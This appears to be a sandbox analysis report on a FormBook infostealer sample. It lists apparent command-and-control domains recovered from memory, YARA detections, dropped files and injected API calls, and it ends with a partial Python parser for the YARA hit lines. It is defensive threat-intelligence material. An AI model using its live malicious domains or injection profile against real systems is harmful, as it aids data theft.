          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.indiankhedu.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.indiankhedu.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.indiankhedu.comReferer:
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.lumenhealthandwellness.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.lumenhealthandwellness.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.lumenhealthandwellness.com/c233/www.affilexample6.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.lumenhealthandwellness.comReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.pro-ecare.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.pro-ecare.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.pro-ecare.com/c233/www.rupanaa.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.pro-ecare.comReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.profitableadvisors.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.profitableadvisors.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.profitableadvisors.com/c233/www.the-mistershop.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.profitableadvisors.comReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.rupanaa.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.rupanaa.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.rupanaa.com/c233/www.henesymarte.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.rupanaa.comReferer:
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.siyuechuanmei.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.siyuechuanmei.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.siyuechuanmei.com/c233/www.advincicode.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.siyuechuanmei.comReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.smartlivegt.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.smartlivegt.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.smartlivegt.com/c233/www.gregorywise.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.smartlivegt.comReferer:
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.the-mistershop.com
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.the-mistershop.com/c233/
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.the-mistershop.com/c233/www.climpuright.icu
          Source: explorer.exe, 00000003.00000003.566251012.000000000E7DF000.00000004.00000001.sdmpString found in binary or memory: http://www.the-mistershop.comReferer:
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.234480208.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\111.exe | Code function: 0_2_004053CB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.723374268.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.724195917.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.248756113.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.249334557.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.249408055.0000000003320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Detected FormBook malware
          Source: C:\Windows\SysWOW64\cmd.exe | Dropped file: C:\Users\user\AppData\Roaming\75841791\758logri.ini
          Source: C:\Windows\SysWOW64\cmd.exe | Dropped file: C:\Users\user\AppData\Roaming\75841791\758logrv.ini
          Malicious sample detected (through community Yara rule)
          Source: 00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.723374268.0000000000990000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.723374268.0000000000990000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.724195917.0000000000D40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.724195917.0000000000D40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.248756113.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.248756113.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.249334557.00000000032F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.249334557.00000000032F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.249408055.0000000003320000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.249408055.0000000003320000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_00419CA0 NtCreateFile
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_00419D50 NtReadFile
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_00419DD0 NtClose
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_00419C9A NtCreateFile
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_00419D4A NtReadFile
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_00419DCA NtClose
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_054995D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_054997A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_054996E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_054999A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499560 NtWriteFile
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_0549AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_054995F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499760 NtOpenProcess
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_0549A770 NtOpenThread
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_0549A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499FE0 NtCreateMutant
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499650 NtQueryValueKey
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499660 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_054996D0 NtCreateKey
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_054999D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_0549B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_054998F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_054998A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_0549A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499A10 NtQuerySection
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_05499A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_00DA54E0 NtDelayExecution
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 2_2_00DA318C NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_011E6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_011EB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_011CB42E NtOpenThreadToken,NtOpenProcessToken,NtClose
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_011C84BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_011C58A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_011CB4C0 NtQueryInformationToken
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_011CB4F8 NtQueryInformationToken,NtQueryInformationToken
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_011C83F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_011E9AB4 NtSetInformationFile
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe | Code function: 24_2_00E3B4F8 NtQueryInformationToken,NtQueryInformationToken
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe | Code function: 24_2_00E3B4C0 NtQueryInformationToken
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe | Code function: 24_2_00E3B42E NtOpenThreadToken,NtOpenProcessToken,NtClose
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe | Code function: 24_2_00E358A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe | Code function: 24_2_00E384BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe | Code function: 24_2_00E5B5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe | Code function: 24_2_00E56D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe | Code function: 24_2_00E59AB4 NtSetInformationFile
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe | Code function: 24_2_00E383F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_011D6550 memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 8_2_011D374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle
          Source: C:\Users\user\Desktop\111.exe | Code function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe 3685495D051137B1C4EFDE22C26DF0883614B6453B762FA84588DA55ED2E7744
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\C2dlxv4\t4nhyl7po.exe 3685495D051137B1C4EFDE22C26DF0883614B6453B762FA84588DA55ED2E7744
          Source: 111.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 111.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: t4nhyl7po.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: t4nhyl7po.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: t4nhyl7po.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: t4nhyl7po.exe0.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: t4nhyl7po.exe0.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: t4nhyl7po.exe0.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: msenc71ui.dll.0.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dllJump to behavior
          Source: 00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.723374268.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.723374268.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.724195917.0000000000D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.724195917.0000000000D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.248756113.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.248756113.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.249334557.00000000032F0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.249334557.00000000032F0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.249408055.0000000003320000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.249408055.0000000003320000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
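          The Source column of each YARA hit encodes where in the analysis the match was found: the analysis process number and run, the base address of the memory region or unpacked PE, and, for .sdmp dumps, a protection value. The Python below is an added example, not part of this report or of the sandbox's own tooling, that parses these lines into structured records so a triage script can group hits by process and region and flag regions that are executable and writable. The field layout of the .sdmp name (process.run.unique.base.protection.type) and of the .unpack name (process.run.image.base.index[.raw].unpack), and the reading of the fifth .sdmp field as a Win32 PAGE_* protection constant, are assumptions; the sample lines are the ten hits above as exported (type column fused to "Matched rule:"), with the rule metadata trimmed after the author field.

```python
"""Parse Joe Sandbox 'Matched rule' lines into structured YARA hits (added example)."""
import re
from dataclasses import dataclass
from typing import Optional

# Win32 memory protection constants from winnt.h, used to decode the .sdmp
# protection field under the ASSUMPTION that the field carries that value.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# One report line. Exported text often fuses the type column with the next
# one ("MEMORYMatched rule:"), so the separator between them is optional.
LINE_RE = re.compile(
    r"Source:\s*(?P<src>\S+?),\s*type:\s*(?P<type>[A-Z]+?)\s*,?\s*"
    r"Matched rule:\s*(?P<rule>\S+)(?P<meta>.*)$"
)
# ASSUMED layout of a memory dump name: process.run.unique.base.protection.type.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<run>\d+)\.\d+\.(?P<base>[0-9A-Fa-f]+)\."
    r"(?P<prot>[0-9A-Fa-f]+)\.[0-9A-Fa-f]+\.sdmp$"
)
# ASSUMED layout of an unpacked PE name: process.run.image.base.index[.raw].unpack
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<run>\d+)\.(?P<image>.+?)\.(?P<base>[0-9A-Fa-f]+)\."
    r"\d+\.(?:raw\.)?unpack$"
)


@dataclass(frozen=True)
class YaraHit:
    process: int            # analysis process number, not an OS PID
    run: int
    base: int               # region / image base address
    source_type: str        # MEMORY or UNPACKEDPE
    rule: str
    author: str
    protection: Optional[int]  # only known for .sdmp memory dumps
    image: Optional[str]       # only known for unpacked PEs


def parse_source(src: str) -> dict:
    """Decode the Source column into process/run/base plus protection or image."""
    m = SDMP_RE.match(src)
    if m:
        return dict(process=int(m["proc"]), run=int(m["run"]),
                    base=int(m["base"], 16), protection=int(m["prot"], 16), image=None)
    m = UNPACK_RE.match(src)
    if m:
        return dict(process=int(m["proc"]), run=int(m["run"]),
                    base=int(m["base"], 16), protection=None, image=m["image"])
    raise ValueError(f"unrecognised source name: {src}")


def parse_hit(line: str) -> Optional[YaraHit]:
    m = LINE_RE.search(line)
    if not m:
        return None
    author = re.search(r"author\s*=\s*([^,]+)", m["meta"])
    return YaraHit(source_type=m["type"], rule=m["rule"],
                   author=author.group(1).strip() if author else "",
                   **parse_source(m["src"]))


def parse_report(lines) -> list:
    return [h for h in (parse_hit(line) for line in lines) if h]


def regions_by_rules(hits) -> dict:
    """Map (process, base) to the sorted list of rule names that fired on it."""
    out = {}
    for h in hits:
        out.setdefault((h.process, h.base), set()).add(h.rule)
    return {k: sorted(v) for k, v in out.items()}


def rwx_regions(hits) -> list:
    """Memory dumps whose protection decodes to PAGE_EXECUTE_READWRITE."""
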